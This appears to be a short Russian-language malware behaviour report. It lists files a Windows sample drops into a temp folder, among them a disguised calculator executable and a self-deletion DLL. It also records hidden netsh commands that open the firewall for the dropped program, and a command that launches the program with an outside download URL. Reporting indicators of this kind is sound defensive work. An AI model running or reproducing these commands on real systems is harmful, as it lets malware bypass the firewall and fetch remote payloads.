Техническая информация
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=kijwiidmuzlcz dir=in action=allow program="%TEMP%\nsa99A1.tmp\kijwiidmuzlcz.exe" enable=yes profile=public,private
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=kijwiidmuzlcz dir=out action=allow program="%TEMP%\nsa99A1.tmp\kijwiidmuzlcz.exe" enable=yes profile=public,private
- %WINDIR%\syswow64\explorer.exe
- %TEMP%\nsa99a1.tmp\nsexec.dll
- %TEMP%\nsa99a1.tmp\basiccalculator1.exe
- %TEMP%\nsa99a1.tmp\plus42windows.zip
- %TEMP%\nsa99a1.tmp\kijwiidmuzlcz.exe
- %TEMP%\nsa99a1.tmp\kijwiidmuzlcz.exe.config
- %TEMP%\nsa99a1.tmp\selfdel.dll
- %TEMP%\nsa99a1.tmp\basiccalculator1.exe
- %TEMP%\nsa99a1.tmp\kijwiidmuzlcz.exe
- %TEMP%\nsa99a1.tmp\kijwiidmuzlcz.exe.config
- %TEMP%\nsa99a1.tmp\nsexec.dll
- %TEMP%\nsa99a1.tmp\plus42windows.zip
- %TEMP%\nsa99a1.tmp\selfdel.dll
- '%TEMP%\nsa99a1.tmp\kijwiidmuzlcz.exe' "http://www.miscarriageowings.click" "%TEMP%\nsa99A1.tmp\1765"
- '%WINDIR%\syswow64\explorer.exe'
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=kijwiidmuzlcz dir=out action=allow program="%TEMP%\nsa99A1.tmp\kijwiidmuzlcz.exe" enable=yes profile=public,private (со скрытым окном)
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=kijwiidmuzlcz dir=in action=allow program="%TEMP%\nsa99A1.tmp\kijwiidmuzlcz.exe" enable=yes profile=public,private (со скрытым окном)